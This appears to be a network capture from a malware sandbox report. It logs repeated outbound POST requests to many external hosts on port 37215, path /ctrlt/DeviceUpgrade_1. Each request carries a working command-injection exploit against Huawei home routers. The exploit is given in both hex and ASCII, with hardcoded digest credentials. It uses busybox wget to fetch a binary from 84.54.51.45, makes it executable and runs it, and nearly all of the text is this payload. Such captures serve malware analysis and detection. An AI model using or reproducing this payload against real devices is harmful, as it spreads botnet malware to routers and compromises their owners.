                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            811192.168.2.154787441.24.178.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740845919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            812192.168.2.153508241.116.193.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740884066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            813192.168.2.153911041.237.32.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740886927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            814192.168.2.155356241.158.10.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740936041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            815192.168.2.154675241.109.129.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740936041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            816192.168.2.154817041.152.188.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740955114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            817192.168.2.155753041.132.47.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740978003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            818192.168.2.155639841.218.104.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741002083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            819192.168.2.154624241.52.61.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741051912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            820192.168.2.154869441.132.234.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741050005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 